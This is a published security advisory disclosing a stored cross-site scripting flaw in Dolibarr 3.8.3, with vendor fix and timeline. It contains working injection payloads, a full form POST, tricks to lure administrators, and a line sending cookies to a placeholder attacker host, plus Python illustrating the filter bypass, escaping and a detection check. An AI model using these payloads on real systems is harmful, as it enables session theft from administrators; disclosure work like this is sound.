Dolibarr 3.8.3 Cross Site Scripting

Posted Jan 11, 2016
Authored by Mickael Dorigny | Site synetis.com

Dolibarr version 3.8.3 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | c17ecf80d34e2c761ee7e596af78927c7c4accbc17e3e897ce53a789bd3b1784

######################################################################
# Exploit Title: XSS on dolibarr 3.8.3
# Date: 03/01/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: http://www.dolibarr.org/
# Category: XSS
######################################################################

Dolibarr description:
======================================================================
Dolibarr ERP & CRM is modern, easy-to-use web software for managing a business (contacts, invoices, orders, products, stock, agenda, emailings, etc.).

It is open-source, free software designed for small companies, foundations and freelancers.
You can install and use it as a standalone application, or online on a shared or dedicated server so that it can be used from anywhere. Dolibarr is also available on ready-to-use cloud services.

Vulnerability description:
======================================================================
A stored XSS vulnerability exists in the Dolibarr 3.8.3 core code. No module needs to be activated to exploit it, because the injection point is the user attribute management feature that every account can reach.

This XSS can be exploited from a basic user account on the Dolibarr installation. Impacted users are administrators and any other users with the right to view other users' attributes.

PoC n°1: Stored XSS in user attributes:
======================================================================
Once a simple user is logged in to their account, they can modify their attributes such as Last name, First name, Mobile number, etc. This information can be reviewed by other users who have administration privileges.

Note that some basic protection is applied when the form is submitted. This protection does not allow an attacker to use basic JavaScript tricks such as "<script>" tags or the "onerror" JavaScript event, but other events are still allowed.

Using the <IMG> HTML tag and the "onmouseover" JavaScript event, the payload fires as soon as an admin passes the mouse over the injected image. This event can be used to execute arbitrary JavaScript in the administrator's browser, or in the browser of any other user allowed to view users' attributes.

PoC:
As an authenticated user, fill the "Last name", "First name", "email", "job" or "signature" input with this:
user1<img src=x onmouseover=alert(1)>

[REQUEST]
http://server/dolibarr/htdocs/user/card.php?id=2
[POSTDATA]
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="token"
3e01b40f4659396870a384c16213e400
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="action"
update
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="entity"
1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="lastname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="firstname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="job"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="gender"
man
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="login"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="password"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="admin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="superadmin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_phone"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="user_mobile"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_fax"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="email"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="signature"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="fk_user"
-1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="weeklyhours"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="save"
Save
-----------------------------7677991721297181448923571907--

Note that "First name" and "Last name" input are displayed in the "List of users" page, but they are truncated after 50 characters. This trunctation limits available XSS payloads. We can use the "signature" input to insert more JavaScript instructions in the same HTML form. Admin will then see this signature when they will click on a user in the "List of users" to see all his attributes.

The image insertion can reference an existing or a non-existent image. One trick to increase the chance of trapping an admin is to use a very large image (e.g. 1920*1080) that covers the whole page.

Once the attributes are modified, another user such as an admin can view them and will execute the JavaScript by passing the mouse over the injected image. Here is another PoC that sends the admin's cookie to an attacker-controlled website using an HTTP GET request. Inject this payload in the "signature" input:
<img src=x onmouseover=document.location="http://hackerserver?c="+document.cookie+"">

Using this vulnerability, an attacker could tamper with page rendering, redirect the victim to a fake login page, or capture user credentials such as session cookies.
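The two observations above (a submit-time blocklist that stops "<script>" and "onerror" but lets "onmouseover" through, and the fact that the stored value is later rendered to privileged users) are easier to reason about in code. The following Python is an added example written for this page; it is not Dolibarr's code and not the author's PoC. `blocklist_filter` is an assumed model of the described input check, `render_cell_safe` shows the output-encoding approach that makes the stored payload inert no matter what the filter missed, and `audit_user_records` is a defender-side check over a constructed users-table export that flags attribute values carrying event-handler markup while leaving harmless "<" characters alone. The payload strings are the ones quoted in the advisory.

```python
import html
import re

# Payloads quoted from the advisory (the same strings the author used).
PAYLOAD_ONMOUSEOVER = "user1<img src=x onmouseover=alert(1)>"
PAYLOAD_SCRIPT = "user1<script>alert(1)</script>"
PAYLOAD_ONERROR = "user1<img src=x onerror=alert(1)>"

# Constructed model of the kind of input blocklist the advisory describes:
# it rejects "<script" and "onerror" and nothing else. This is an assumption
# about the behaviour reported, not Dolibarr's actual code.
_BLOCKLIST = ("<script", "onerror")


def blocklist_filter(value: str) -> str:
    """Return value unchanged unless it contains a blocklisted token;
    a rejected value is replaced by the empty string."""
    lowered = value.lower()
    return "" if any(tok in lowered for tok in _BLOCKLIST) else value


def render_cell_unsafe(value: str) -> str:
    """Model of a template that interpolates the stored value verbatim."""
    return f"<td>{value}</td>"


def render_cell_safe(value: str) -> str:
    """Contextual output encoding: entity-escape at render time, independent
    of whatever the input filter happened to accept."""
    return f"<td>{html.escape(value, quote=True)}</td>"


# A tag that carries an on<event>= attribute, e.g. <img ... onmouseover=...>.
_EVENT_HANDLER_TAG = re.compile(r"<[^>]*\bon[a-z]+\s*=", re.IGNORECASE)


def contains_active_markup(rendered: str) -> bool:
    """True if the rendered HTML still contains a tag with an event handler."""
    return bool(_EVENT_HANDLER_TAG.search(rendered))


def audit_user_records(records):
    """Flag stored user attributes that contain markup with event handlers.
    Returns (login, field) pairs; a bare '<' in a name is not flagged."""
    findings = []
    for rec in records:
        for field, value in rec.items():
            if field != "login" and isinstance(value, str) \
                    and _EVENT_HANDLER_TAG.search(value):
                findings.append((rec["login"], field))
    return findings


# Constructed sample of a users-table export (not real Dolibarr data).
SAMPLE_USERS = [
    {"login": "admin", "lastname": "Admin", "signature": "Best regards"},
    {"login": "user1", "lastname": PAYLOAD_ONMOUSEOVER, "signature": PAYLOAD_ONMOUSEOVER},
    {"login": "user2", "lastname": "O'Brien <sales>", "signature": ""},
]


def demo():
    """Summarise what the blocklist stops, what slips through, and that
    output encoding neutralises the stored value regardless."""
    passed = blocklist_filter(PAYLOAD_ONMOUSEOVER)
    return {
        "script_blocked": blocklist_filter(PAYLOAD_SCRIPT) == "",
        "onerror_blocked": blocklist_filter(PAYLOAD_ONERROR) == "",
        "onmouseover_passes_filter": passed == PAYLOAD_ONMOUSEOVER,
        "unsafe_render_is_active": contains_active_markup(render_cell_unsafe(passed)),
        "safe_render_is_inert": not contains_active_markup(render_cell_safe(passed)),
        "audit_findings": audit_user_records(SAMPLE_USERS),
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val}")
```

The point of `render_cell_safe` is that a blocklist on input can only ever be as complete as the list of events its author remembered, whereas escaping on output is context-driven and needs no knowledge of individual handlers; the audit function is what an administrator would run over existing user records after upgrading, since values stored before the fix stay in the database.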


Screenshots:
======================================================================
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-03.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-04.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-05.jpg

Solution:
======================================================================

The fix for this vulnerability is available in the Dolibarr GitHub repository: https://github.com/Dolibarr/dolibarr/issues/4341 / https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56

Additional resources:
======================================================================
- https://www.youtube.com/watch?v=p2rFWJOCJC8
- http://www.information-security.fr/en/xss-dolibarr-version-3-8-3/
- https://github.com/Dolibarr/dolibarr/issues/4341
- https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56


Report timeline:
======================================================================
2016-01-03 : Vendor informed of the vulnerability
2016-01-07 : Vulnerability fixed
2016-01-11 : Advisory published

Credits:
======================================================================

[Synetis ASCII-art logo]
www.synetis.com
Consulting firm in management and information security

Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr